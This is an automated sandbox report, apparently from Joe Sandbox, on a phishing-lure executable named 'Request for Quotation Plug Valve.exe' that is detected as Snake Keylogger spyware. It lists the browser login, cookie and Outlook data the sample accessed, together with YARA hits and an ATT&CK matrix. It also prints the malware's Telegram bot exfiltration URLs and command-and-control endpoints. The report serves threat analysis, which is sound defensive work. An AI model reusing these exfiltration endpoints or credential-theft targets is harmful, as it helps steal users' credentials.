                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 3_2_068E9548 LdrInitializeThunk,3_2_068E9548
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeProcess created: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    1
                    Query Registry
                    Remote Services1
                    Email Collection
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    LSASS Memory1
                    Security Software Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion
                    Security Account Manager1
                    Process Discovery
                    SMB/Windows Admin Shares1
                    Data from Local System
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS31
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture3
                    Ingress Tool Transfer
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeylogging3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Network Configuration Discovery
                    VNCGUI Input Capture24
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Software Packing
                    DCSync13
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Request for Quotation Plug Valve.exe55%ReversingLabsWin32.Spyware.Snakekeylogger
                    Request for Quotation Plug Valve.exe100%AviraHEUR/AGEN.1309290
                    Request for Quotation Plug Valve.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    208.91.199.223
                    truetrue
                      unknown
                      s-part-0017.t-0009.t-msedge.net
                      13.107.246.45
                      truefalse
                        unknown
                        reallyfreegeoip.org
                        188.114.96.3
                        truetrue
                          unknown
                          api.telegram.org
                          149.154.167.220
                          truetrue
                            unknown
                            checkip.dyndns.com
                            193.122.130.0
                            truefalse
                              unknown
                              checkip.dyndns.org
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  unknown
                                  https://reallyfreegeoip.org/xml/8.46.123.33false
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.org/false
                                  • URL Reputation: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D98000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://duckduckgo.com/chrome_newtabRequest for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.orgRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoRequest for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://api.telegram.org/botRequest for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          unknown
                                          http://us2.smtp.mailhostbox.comRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.office.com/lBRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20aRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://checkip.dyndns.orgRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://chrome.google.com/webstore?hl=enRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.ecosia.org/newtab/Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://varders.kozow.com:8081Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://aborters.duckdns.org:8081Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://51.38.247.67:8081/_send_.php?LRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/8.46.123.33$Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://anotherarmy.dns.army:8081Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRequest for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://checkip.dyndns.org/qRequest for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://chrome.google.com/webstore?hl=enlBRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://reallyfreegeoip.orgRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequest for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRequest for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://reallyfreegeoip.org/xml/Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.154.167.220
                                                                api.telegram.orgUnited Kingdom
                                                                62041TELEGRAMRUtrue
                                                                188.114.96.3
                                                                reallyfreegeoip.orgEuropean Union
                                                                13335CLOUDFLARENETUStrue
                                                                193.122.130.0
                                                                checkip.dyndns.comUnited States
                                                                31898ORACLE-BMC-31898USfalse
                                                                208.91.199.223
                                                                us2.smtp.mailhostbox.comUnited States
                                                                394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1529007
                                                                Start date and time:2024-10-08 15:09:07 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 19s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:6
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Request for Quotation Plug Valve.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@3/1@5/4
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 90
                                                                • Number of non-executed functions: 33
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
